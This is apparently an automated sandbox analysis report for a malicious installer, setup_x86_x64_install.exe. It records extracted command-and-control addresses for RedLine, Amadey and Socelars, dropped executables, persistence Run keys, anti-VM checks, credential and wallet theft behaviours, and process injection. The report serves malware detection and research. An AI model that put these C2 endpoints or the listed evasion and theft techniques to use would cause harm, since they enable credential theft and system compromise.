Analysis
-
max time kernel
727s -
max time network
1812s -
platform
windows11_x64 -
resource
win11 -
submitted
13-11-2021 17:35
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20211014
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211104
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211104
General
-
Target
setup_x86_x64_install.exe
-
Size
9.1MB
-
MD5
0ccaba8f07f43baba600ee09864dd488
-
SHA1
fc6205c186b040cd6b2c30e1c4f161ec2eea2a47
-
SHA256
cf878de150bbfc29baab8635e159bb2733e63f1dbd954374258a55ee73982f0a
-
SHA512
3f7602933e91c3b06f44821ae8706b6ab25389dbddeb7f28fc89ba4e84b234ff759ac8b6062fccbf565860302ec59884333115cb22dbedf66bd2bdc77d06db6e
Malware Config
Extracted
socelars
http://www.hhgenice.top/
Extracted
amadey
2.82
185.215.113.45/g4MbvE/index.php
Extracted
redline
media13111
91.121.67.60:51630
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1652 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8060 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6536 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10216 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5752 4908 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 16504 4908 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5412-327-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5412-329-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat160ff2e199851.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat160ff2e199851.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 34 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeAC5A.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5332 created 5192 5332 WerFault.exe cmd.exe PID 2276 created 4552 2276 WerFault.exe WerFault.exe PID 6444 created 5028 6444 LzmwAqmV.exe PID 6368 created 3676 6368 WerFault.exe Chrome5.exe PID 6120 created 5452 6120 tkools.exe PID 7100 created 1100 7100 WerFault.exe OblbIZVPY7a0tO5Oh7yjmZQL.exe PID 3240 created 2216 3240 WerFault.exe Worldoffer.exe PID 6452 created 6564 6452 WerFault.exe ey4uvXWEOUalkU_eykdaluyu.exe PID 6120 created 1628 6120 Xf_zx9O1XjyURUhCmLjojbZL.exe PID 7016 created 6580 7016 WerFault.exe chrome.exe PID 5124 created 7040 5124 WerFault.exe chrome update.exe PID 3788 created 5048 3788 WerFault.exe chrome1.exe PID 7052 created 7084 7052 setup.exe PID 5124 created 3568 5124 WerFault.exe WerFault.exe PID 7344 created 6812 7344 WerFault.exe rundll32.exe PID 2588 created 5028 2588 WerFault.exe LzmwAqmV.exe PID 5960 created 2616 5960 WerFault.exe rGwY69WmOM_qqsBGjBQCwu70.exe PID 8068 created 5288 8068 WerFault.exe WBGMEjP2ZOPhKrFm3D2PsxK2.exe PID 6368 created 2396 6368 WerFault.exe B9fyo7QqeK801elsQ3zzApZx.exe PID 6952 created 3532 6952 WerFault.exe I43HlxEfzYdBanh5sTg7Y_zX.exe PID 4060 created 4056 4060 WerFault.exe PQBJTAaQtTewucBijOxkjY_l.exe PID 6288 created 3560 6288 WerFault.exe UiCHUYf2DCZO0cVtFmpt1M5s.exe PID 2740 created 6628 2740 WerFault.exe rundll32.exe PID 5520 created 720 5520 AC5A.exe 41QX82bYGlA3Bkj6dsFQtiUV.exe PID 784 created 2192 784 WerFault.exe vg9O1s8jU7nNIaD25edzyuif.exe PID 2200 created 8084 2200 WerFault.exe C292.exe PID 10308 created 10244 10308 WerFault.exe rundll32.exe PID 11096 created 8840 11096 WerFault.exe 34D6.exe PID 12384 created 12316 12384 WerFault.exe rundll32.exe PID 13564 created 12300 13564 WerFault.exe build.exe PID 13636 created 12232 13636 WerFault.exe ganfarm.exe PID 16092 created 12040 16092 WerFault.exe D938.exe PID 16632 created 16516 16632 WerFault.exe rundll32.exe PID 19280 created 18908 19280 WerFault.exe srvs.exe -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/2216-528-0x00000000022A0000-0x0000000002375000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 43 IoCs
Processes:
msiexec.exerundll32.exepowershell.exeMsiExec.exeflow pid process 203 5816 msiexec.exe 247 6536 rundll32.exe 1142 12460 powershell.exe 1256 12896 MsiExec.exe 1262 12896 MsiExec.exe 1276 12896 MsiExec.exe 1289 12896 MsiExec.exe 1301 12896 MsiExec.exe 1308 12896 MsiExec.exe 1314 12896 MsiExec.exe 1321 12896 MsiExec.exe 1332 12896 MsiExec.exe 1344 12896 MsiExec.exe 1357 12896 MsiExec.exe 1377 12896 MsiExec.exe 1389 12896 MsiExec.exe 1401 12896 MsiExec.exe 1403 12896 MsiExec.exe 1412 12896 MsiExec.exe 1420 12896 MsiExec.exe 1427 12896 MsiExec.exe 1433 12896 MsiExec.exe 1437 12896 MsiExec.exe 1443 12896 MsiExec.exe 1460 12896 MsiExec.exe 1474 12896 MsiExec.exe 1483 12896 MsiExec.exe 1490 12896 MsiExec.exe 1496 12896 MsiExec.exe 1504 12896 MsiExec.exe 1511 12896 MsiExec.exe 1517 12896 MsiExec.exe 1522 12896 MsiExec.exe 1531 12896 MsiExec.exe 1544 12896 MsiExec.exe 1555 12896 MsiExec.exe 1563 12896 MsiExec.exe 1581 12896 MsiExec.exe 1589 12896 MsiExec.exe 1595 12896 MsiExec.exe 1602 12896 MsiExec.exe 1607 12896 MsiExec.exe 1615 12896 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
lakazet.exelakazet.exelakazet.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts lakazet.exe File opened for modification C:\Windows\system32\drivers\etc\hosts lakazet.exe File opened for modification C:\Windows\system32\drivers\etc\hosts lakazet.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSat16dbfd538b0b.exeSat1600f41eca.exeSat162b769f285d4a78.exeSat163af1aa81.exeSat169c60f22b8.exeSat16862c2e159d0a4.exeSat1682c535a6fcb6e7.exeSat16066e28b50208.exeSat16af470129.exeSat163b771375.exeSat160ff2e199851.exeSat1624bfc23ff9f.exeSat1612020d5c.exeSat1624bfc23ff9f.exeSat1637cdb9d96.exeSat16156abf9c.exeSat163b771375.exeSat169c60f22b8.tmpSat16af470129.tmpSat169c60f22b8.exeSat169c60f22b8.tmptkools.exelakazet.exeSat16066e28b50208.exe6836899.exe856814.exeAhWVemGiKw7SpgUWHHpZkjyt.exeConhost.exeAhWVemGiKw7SpgUWHHpZkjyt.exeConhost.exeSoftwareInstaller2191.exeTyIOGZL_DGrJm.EXe5377420.exeAppLaunch.exeWorldoffer.exeSPbqmysrbDmwN9BKwv6anVMQ.exevrDet9OfjstR25razE2Nylyc.exeUeuBMbC_JvHWFwRUeq1Z4yhO.exeXf_zx9O1XjyURUhCmLjojbZL.exe9osAN_jHjbdtS1wgTHVWBnwP.exeUiCHUYf2DCZO0cVtFmpt1M5s.exeI43HlxEfzYdBanh5sTg7Y_zX.exerGwY69WmOM_qqsBGjBQCwu70.exeWerFault.exeB9fyo7QqeK801elsQ3zzApZx.exePQBJTAaQtTewucBijOxkjY_l.exeuNllGlcbm2GVjpyTbg93jDn7.exe7PEDuinOLwXYX_6iGkQn8Cc8.exefBp6HqC0_TNfSR_tIpttHvQC.exeOblbIZVPY7a0tO5Oh7yjmZQL.exeJ9zM_BwL31SvyQCz441NjFE2.exe8sTAAiYk2sEOrXXjfesKoFdn.exeWBGMEjP2ZOPhKrFm3D2PsxK2.exeOLyCAAaDhlJD4xz9ygf7NwsA.exe4172725.exekwpQoqQ0RdrnOPfE49tQ0tRM.tmpinst2.exenetsh.exeey4uvXWEOUalkU_eykdaluyu.exejg1_1faf.execm3.exe8379179.exepid process 2184 setup_installer.exe 3176 setup_install.exe 3800 Sat16dbfd538b0b.exe 3060 Sat1600f41eca.exe 3692 Sat162b769f285d4a78.exe 5016 Sat163af1aa81.exe 1476 Sat169c60f22b8.exe 2092 Sat16862c2e159d0a4.exe 5028 Sat1682c535a6fcb6e7.exe 4900 Sat16066e28b50208.exe 4152 Sat16af470129.exe 4828 Sat163b771375.exe 4552 Sat160ff2e199851.exe 4544 Sat1624bfc23ff9f.exe 2216 Sat1612020d5c.exe 2932 Sat1624bfc23ff9f.exe 1432 Sat1637cdb9d96.exe 3676 Sat16156abf9c.exe 2696 Sat163b771375.exe 5044 Sat169c60f22b8.tmp 2196 Sat16af470129.tmp 2144 Sat169c60f22b8.exe 5268 Sat169c60f22b8.tmp 5452 tkools.exe 5536 lakazet.exe 5412 Sat16066e28b50208.exe 5816 6836899.exe 5896 856814.exe 5984 AhWVemGiKw7SpgUWHHpZkjyt.exe 5944 Conhost.exe 6048 AhWVemGiKw7SpgUWHHpZkjyt.exe 5132 Conhost.exe 2996 SoftwareInstaller2191.exe 5660 TyIOGZL_DGrJm.EXe 5484 5377420.exe 5340 AppLaunch.exe 2216 Worldoffer.exe 1284 SPbqmysrbDmwN9BKwv6anVMQ.exe 5336 vrDet9OfjstR25razE2Nylyc.exe 2240 UeuBMbC_JvHWFwRUeq1Z4yhO.exe 1628 Xf_zx9O1XjyURUhCmLjojbZL.exe 1676 9osAN_jHjbdtS1wgTHVWBnwP.exe 3560 UiCHUYf2DCZO0cVtFmpt1M5s.exe 3532 I43HlxEfzYdBanh5sTg7Y_zX.exe 2616 rGwY69WmOM_qqsBGjBQCwu70.exe 3568 WerFault.exe 2396 B9fyo7QqeK801elsQ3zzApZx.exe 4056 PQBJTAaQtTewucBijOxkjY_l.exe 6028 uNllGlcbm2GVjpyTbg93jDn7.exe 2032 7PEDuinOLwXYX_6iGkQn8Cc8.exe 1572 fBp6HqC0_TNfSR_tIpttHvQC.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 1892 J9zM_BwL31SvyQCz441NjFE2.exe 2896 8sTAAiYk2sEOrXXjfesKoFdn.exe 5288 WBGMEjP2ZOPhKrFm3D2PsxK2.exe 3720 OLyCAAaDhlJD4xz9ygf7NwsA.exe 6240 4172725.exe 6252 kwpQoqQ0RdrnOPfE49tQ0tRM.tmp 6464 inst2.exe 6556 netsh.exe 6564 ey4uvXWEOUalkU_eykdaluyu.exe 6572 jg1_1faf.exe 6592 cm3.exe 6604 8379179.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
5377420.exeganfarm.exevrDet9OfjstR25razE2Nylyc.exeD138.exeUeuBMbC_JvHWFwRUeq1Z4yhO.exe8412671.exeWw.exeConhost.exeXf_zx9O1XjyURUhCmLjojbZL.exe4172725.exe2325315.exe5011017.exebuild.exe8069537.exe7646913.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5377420.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ganfarm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vrDet9OfjstR25razE2Nylyc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion D138.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ganfarm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UeuBMbC_JvHWFwRUeq1Z4yhO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vrDet9OfjstR25razE2Nylyc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8412671.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ww.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ww.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Xf_zx9O1XjyURUhCmLjojbZL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5377420.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4172725.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2325315.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion D138.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4172725.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5011017.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5011017.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2325315.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8069537.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8069537.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7646913.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8412671.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Xf_zx9O1XjyURUhCmLjojbZL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UeuBMbC_JvHWFwRUeq1Z4yhO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7646913.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSat169c60f22b8.tmpSat16af470129.tmpSat169c60f22b8.tmpcmd.exeCalculator Installation.exekwpQoqQ0RdrnOPfE49tQ0tRM.tmpSg5zNg8pvLcFbf509SrSiImk.exerundll32.exerundll32.exeOblbIZVPY7a0tO5Oh7yjmZQL.exemt1GBIsJD_LSfQtJhR6C12ul.tmpsetup.exerundll32.exerundll32.exesetup.exemsiexec.exerundll32.exerundll32.exeinstaller.exerundll32.exeMsiExec.execlient32.exeDone.exerundll32.exeMsiExec.exepid process 3176 setup_install.exe 3176 setup_install.exe 3176 setup_install.exe 3176 setup_install.exe 3176 setup_install.exe 5044 Sat169c60f22b8.tmp 2196 Sat16af470129.tmp 5268 Sat169c60f22b8.tmp 5192 cmd.exe 4308 Calculator Installation.exe 4308 Calculator Installation.exe 6252 kwpQoqQ0RdrnOPfE49tQ0tRM.tmp 3660 Sg5zNg8pvLcFbf509SrSiImk.exe 3660 Sg5zNg8pvLcFbf509SrSiImk.exe 3660 Sg5zNg8pvLcFbf509SrSiImk.exe 4308 Calculator Installation.exe 4308 Calculator Installation.exe 6812 rundll32.exe 4308 Calculator Installation.exe 8160 rundll32.exe 8160 rundll32.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 6224 mt1GBIsJD_LSfQtJhR6C12ul.tmp 3708 setup.exe 3708 setup.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 7356 rundll32.exe 7356 rundll32.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 1100 OblbIZVPY7a0tO5Oh7yjmZQL.exe 6628 rundll32.exe 5760 setup.exe 5760 setup.exe 5816 msiexec.exe 5816 msiexec.exe 7140 rundll32.exe 7140 rundll32.exe 860 rundll32.exe 860 rundll32.exe 6864 installer.exe 6864 installer.exe 10244 rundll32.exe 6864 installer.exe 10608 MsiExec.exe 10608 MsiExec.exe 11424 client32.exe 11424 client32.exe 11424 client32.exe 11424 client32.exe 11424 client32.exe 11424 client32.exe 12072 Done.exe 12316 rundll32.exe 12896 MsiExec.exe 12896 MsiExec.exe 12896 MsiExec.exe 12896 MsiExec.exe 12896 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
setup.exe856814.exelakazet.exelakazet.exemsedge.exesetup.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --cSExK3QD" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 856814.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows NT\\Camejogufu.exe\"" lakazet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Jaqewuvuhae.exe\"" lakazet.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --cSExK3QD" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
5011017.exe7646913.exe8412671.exeUeuBMbC_JvHWFwRUeq1Z4yhO.exebuild.exeD138.exeganfarm.exe4172725.exevrDet9OfjstR25razE2Nylyc.exe8069537.exe2325315.exejg1_1faf.exeWw.exeXf_zx9O1XjyURUhCmLjojbZL.exe5377420.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5011017.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7646913.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8412671.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UeuBMbC_JvHWFwRUeq1Z4yhO.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA build.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D138.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ganfarm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4172725.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vrDet9OfjstR25razE2Nylyc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8069537.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2325315.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ww.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Xf_zx9O1XjyURUhCmLjojbZL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5377420.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rvs.exemsiexec.exeinstaller.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\X: rvs.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: rvs.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: rvs.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: rvs.exe File opened (read-only) \??\Z: rvs.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: rvs.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: rvs.exe File opened (read-only) \??\J: rvs.exe File opened (read-only) \??\L: rvs.exe File opened (read-only) \??\Q: rvs.exe File opened (read-only) \??\R: rvs.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: rvs.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\N: rvs.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: rvs.exe File opened (read-only) \??\Y: rvs.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: rvs.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: rvs.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: rvs.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ipinfo.io 48 ipinfo.io 218 ipinfo.io 257 ipinfo.io 7 ip-api.com 47 ipinfo.io 144 ipinfo.io 193 ipinfo.io 218 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Processes:
Conhost.exe5377420.exe4172725.exevrDet9OfjstR25razE2Nylyc.exeUeuBMbC_JvHWFwRUeq1Z4yhO.exe7646913.exe8069537.exe8412671.exe5011017.exe2325315.exeD138.exeWw.exepid process 5132 Conhost.exe 5484 5377420.exe 6240 4172725.exe 5336 vrDet9OfjstR25razE2Nylyc.exe 2240 UeuBMbC_JvHWFwRUeq1Z4yhO.exe 5160 7646913.exe 800 8069537.exe 4276 8412671.exe 6676 5011017.exe 7584 2325315.exe 11908 D138.exe 12452 Ww.exe -
Suspicious use of SetThreadContext 14 IoCs
Processes:
Sat1624bfc23ff9f.exeSat16066e28b50208.exeXf_zx9O1XjyURUhCmLjojbZL.exeSPbqmysrbDmwN9BKwv6anVMQ.exe8sTAAiYk2sEOrXXjfesKoFdn.exefBp6HqC0_TNfSR_tIpttHvQC.exeAC5A.exegcleaner.execonhost.exe4BF9.exeE444.exebuild.exeganfarm.exeRadiophony.exedescription pid process target process PID 4544 set thread context of 2932 4544 Sat1624bfc23ff9f.exe Sat1624bfc23ff9f.exe PID 4900 set thread context of 5412 4900 Sat16066e28b50208.exe Sat16066e28b50208.exe PID 1628 set thread context of 5340 1628 Xf_zx9O1XjyURUhCmLjojbZL.exe AppLaunch.exe PID 1284 set thread context of 7080 1284 SPbqmysrbDmwN9BKwv6anVMQ.exe SPbqmysrbDmwN9BKwv6anVMQ.exe PID 2896 set thread context of 8076 2896 8sTAAiYk2sEOrXXjfesKoFdn.exe 8sTAAiYk2sEOrXXjfesKoFdn.exe PID 1572 set thread context of 6316 1572 fBp6HqC0_TNfSR_tIpttHvQC.exe fBp6HqC0_TNfSR_tIpttHvQC.exe PID 35804 set thread context of 5520 35804 AC5A.exe AC5A.exe PID 3848 set thread context of 7964 3848 gcleaner.exe gcleaner.exe PID 35136 set thread context of 8624 35136 conhost.exe explorer.exe PID 5804 set thread context of 9844 5804 4BF9.exe 4BF9.exe PID 7748 set thread context of 11528 7748 E444.exe E444.exe PID 12300 set thread context of 7004 12300 build.exe AppLaunch.exe PID 12232 set thread context of 13284 12232 ganfarm.exe AppLaunch.exe PID 12484 set thread context of 13216 12484 Radiophony.exe Radiophony.exe -
Drops file in Program Files directory 18 IoCs
Processes:
